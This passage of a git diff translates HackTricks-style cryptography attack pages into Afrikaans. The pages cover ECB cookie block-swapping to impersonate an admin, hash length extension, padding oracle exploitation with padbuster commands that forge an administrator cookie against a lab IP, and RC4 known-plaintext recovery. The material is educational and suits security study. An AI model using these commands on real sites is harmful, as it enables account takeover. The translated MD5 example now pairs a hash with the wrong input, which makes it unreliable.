`WHERE username='admin ';` _(Let op die ekstra spasies)_ -In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ +Dus, 'n ander manier om die gebruiker `admin` na te boots, sou wees om: -So, another way to impersonate the user `admin` would be to: +* Genereer 'n gebruikersnaam wat: `len() + len(` 2 blokke van 8Bs genereer. +* Genereer dan 'n wagwoord wat 'n presiese aantal blokke vul wat die gebruikersnaam bevat wat ons wil na boots, en spasies, soos: `admin ` -* Generate a username that: `len() + len(` will generate 2 blocks of 8Bs. -* Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin ` +Die koekie van hierdie gebruiker sal bestaan uit 3 blokke: die eerste 2 is die blokke van die gebruikersnaam + delimiter en die derde een van die wagwoord (wat die gebruikersnaam naboots): `username |admin ` -The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` +**Vervang dan net die eerste blok met die laaste keer en jy boots die gebruiker `admin` na: `admin |username`** -**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** - -## References +## Verwysings * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 59c28f7cf..1c86ca9e3 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,66 +1,62 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Summary of the attack +# Opsomming van die aanval -Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: +Stel jou voor 'n bediener wat 'n paar **data** onderteken deur 'n **geheim** by 'n bekende teksdata te **voeg** en dan daardie data te hash. As jy weet: -* **The length of the secret** (this can be also bruteforced from a given length range) -* **The clear text data** -* **The algorithm (and it's vulnerable to this attack)** -* **The padding is known** - * Usually a default one is used, so if the other 3 requirements are met, this also is - * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed +* **Die lengte van die geheim** (dit kan ook gekraak word binne 'n gegewe lengtebereik) +* **Die duidelike teksdata** +* **Die algoritme (en dit is vatbaar vir hierdie aanval)** +* **Die opvulling is bekend** +* Gewoonlik word 'n verstek een gebruik, so as die ander 3 vereistes voldoen word, is dit ook die geval +* Die opvulling varieer afhangende van die lengte van die geheim+data, daarom is die lengte van die geheim nodig -Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. +Dan is dit moontlik vir 'n **aanvaller** om **data** by te voeg en 'n geldige **handtekening** te genereer vir die **vorige data + bygevoegde data**. -## How? +## Hoe? -Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. +Basies genereer die vatbare algoritmes die hasings deur eerstens 'n blok data te hash, en dan, **van** die **voorheen** geskep **hash** (toestand), voeg hulle die volgende blok data by en hash dit. -Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ -If an attacker wants to append the string "append" he can: +Stel jou voor dat die geheim "geheim" is en die data "data" is, die MD5 van "geheimdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ +As 'n aanvaller die string "byvoeg" wil byvoeg, kan hy: -* Generate a MD5 of 64 "A"s -* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b -* Append the string "append" -* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** +* Genereer 'n MD5 van 64 "A"s +* Verander die toestand van die voorheen geïnisialiseerde hash na 6036708eba0d11f6ef52ad44e8b74d5b +* Voeg die string "byvoeg" by +* Voltooi die hash en die resulterende hash sal 'n **geldige een wees vir "geheim" + "data" + "opvulling" + "byvoeg"** -## **Tool** +## **Hulpmiddel** {% embed url="https://github.com/iagox86/hash_extender" %} -## References +## Verwysings -You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +Jy kan hierdie aanval goed verduidelik vind by [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 4a5994b5c..28cb96ab0 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,38 +1,36 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# CBC - Cipher Block Chaining -In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: +In CBC-modus word die **vorige versleutelde blok as IV** gebruik om te XOR met die volgende blok: ![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) -To decrypt CBC the **opposite** **operations** are done: +Om CBC te ontsluit, word die **teenoorgestelde** **bewerkings** gedoen: ![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) -Notice how it's needed to use an **encryption** **key** and an **IV**. +Let daarop dat 'n **versleutelingsleutel** en 'n **IV** gebruik moet word. -# Message Padding +# Boodskapvulling -As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ -Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. +Aangesien die versleuteling in **vasgestelde** **blokke** **uitgevoer** word, word **vulling** gewoonlik in die **laaste** **blok** benodig om sy lengte te voltooi.\ +Gewoonlik word **PKCS7** gebruik, wat 'n vulling genereer wat die **aantal** **byte** **benodig** om die blok te voltooi, **herhaal**. Byvoorbeeld, as die laaste blok 3 byte kortkom, sal die vulling `\x03\x03\x03` wees. -Let's look at more examples with a **2 blocks of length 8bytes**: +Kom ons kyk na meer voorbeelde met 'n **2 blokke van 8 byte**: | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | @@ -41,51 +39,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Note how in the last example the **last block was full so another one was generated only with padding**. +Let daarop hoe in die laaste voorbeeld die **laaste blok vol was, dus is nog een gegenereer slegs met vulling**. # Padding Oracle -When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. +Wanneer 'n toepassing versleutelde data ontsluit, sal dit eers die data ontsluit; dan sal dit die vulling verwyder. Tydens die skoonmaak van die vulling, as 'n **ongeldige vulling 'n waarneembare gedrag teweegbring**, het jy 'n **padding-orakel kwesbaarheid**. Die waarneembare gedrag kan 'n **fout**, 'n **gebrek aan resultate**, of 'n **stadiger reaksie** wees. -If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. +As jy hierdie gedrag opspoor, kan jy die **versleutelde data ontsluit** en selfs **enige duidelike teks versleutel**. -## How to exploit - -You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do +## Hoe om uit te buit +Jy kan [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) gebruik om hierdie tipe kwesbaarheid uit te buit of net die volgende doen ``` sudo apt-get install padbuster ``` - -In order to test if the cookie of a site is vulnerable you could try: - +Om te toets of die koekie van 'n webwerf kwesbaar is, kan jy probeer: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` +**Kodering 0** beteken dat **base64** gebruik word (maar ander is beskikbaar, kyk na die hulpmenu). -**Encoding 0** means that **base64** is used (but others are available, check the help menu). - -You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter: - +Jy kan ook **misbruik maak van hierdie kwesbaarheid om nuwe data te enkripteer. Byvoorbeeld, stel jou voor dat die inhoud van die koekie is "**_**gebruiker=MyGebruikersnaam**_**", dan kan jy dit verander na "\_gebruiker=administrateur\_" en voorregte binne die toepassing verhoog. Jy kan dit ook doen deur `paduster` te gebruik en die -plaintext** parameter te spesifiseer: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` - -If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. - +As die webwerf kwesbaar is, sal `padbuster` outomaties probeer om te vind wanneer die padding-fout plaasvind, maar jy kan ook die foutboodskap aandui deur die **-error** parameter te gebruik. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` +## Die teorie -## The theory - -In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. +In **opsomming**, jy kan begin om die versleutelde data te ontsluit deur die regte waardes te raai wat gebruik kan word om al die **verskillende opvullings** te skep. Dan sal die padding-orakelaanval begin om byte van die einde na die begin te ontsluit deur te raai watter die regte waarde sal wees wat **'n opvulling van 1, 2, 3, ens. skep**. ![](<../.gitbook/assets/image (629) (1) (1).png>) -Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\ -In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\ -Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So: +Stel jou voor jy het 'n paar versleutelde teks wat **2 blokke** beslaan, gevorm deur die bytes van **E0 tot E15**.\ +Om die **laaste blok** (**E8** tot **E15**) te **ontsluit**, gaan die hele blok deur die "blok-sifer ontsluiting" wat die **tussengangerbyte I0 tot I15** genereer.\ +Uiteindelik word elke tussengangerbyte **XORed** met die vorige versleutelde bytes (E0 tot E7). So: * `C15 = D(E15) ^ E7 = I15 ^ E7` * `C14 = I14 ^ E6` @@ -93,44 +83,42 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes ( * `C12 = I12 ^ E4` * ... -Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7` +Nou is dit moontlik om **`E7` te wysig totdat `C15` `0x01` is**, wat ook 'n korrekte opvulling sal wees. Dus, in hierdie geval: `\x01 = I15 ^ E'7` -So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7` +Dus, deur E'7 te vind, is dit **moontlik om I15 te bereken**: `I15 = 0x01 ^ E'7` -Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +Dit stel ons in staat om **C15 te bereken**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`. +Wetende **C15**, is dit nou moontlik om **C14 te bereken**, maar hierdie keer deur die opvulling `\x02\x02` te kragtig te raai. -This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\ -Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** +Hierdie BF is net so ingewikkeld as die vorige een, omdat dit moontlik is om die `E''15` te bereken, waarvan die waarde 0x02 is: `E''7 = \x02 ^ I15` dus hoef jy net die **`E'14`** te vind wat 'n **`C14` gelyk aan `0x02`** genereer.\ +Doen dan dieselfde stappe om C14 te ontsluit: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Follow this chain until you decrypt the whole encrypted text.** +**Volg hierdie ketting totdat jy die hele versleutelde teks ontsluit.** -## Detection of the vulnerability +## Opmerking van die kwesbaarheid -Register and account and log in with this account .\ -If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t. +Registreer en rekeninge en teken in met hierdie rekening.\ +As jy **baie keer teken** en altyd dieselfde koekie kry, is daar waarskynlik **iets fout** in die toepassing. Die koekie wat teruggestuur word, moet elke keer wat jy teken, uniek wees. As die koekie **altyd** dieselfde is, sal dit waarskynlik altyd geldig wees en sal daar **geen manier wees om dit ongeldig te maak nie**. -Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\ -But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster. +Nou, as jy probeer om die **koekie te wysig**, kan jy sien dat jy 'n **fout** van die toepassing kry.\ +Maar as jy die opvulling BF (deur byvoorbeeld padbuster te gebruik), slaag jy daarin om 'n ander koekie te kry wat geldig is vir 'n ander gebruiker. Hierdie scenario is baie waarskynlik kwesbaar vir padbuster. -## References +## Verwysings * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index e951992a4..34ebea7da 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function. +As jy op een of ander manier 'n platte teks kan enkripteer met RC4, kan jy enige inhoud wat deur daardie RC4 enkripteer is (met dieselfde wagwoord) dekripteer deur net die enkripsiefunksie te gebruik. -If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: +As jy 'n bekende platte teks kan enkripteer, kan jy ook die wagwoord onttrek. Meer verwysings kan gevind word in die HTB Kryptos-masjien: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} @@ -29,16 +27,14 @@ If you can encrypt a known plaintext you can also extract the password. More ref
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/emails-vulns.md b/emails-vulns.md index 61765ef5f..917a87dcb 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,16 +1,16 @@ -# Emails Vulnerabilities +# E-poskwesbaarhede
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -20,14 +20,14 @@ Other ways to support HackTricks:
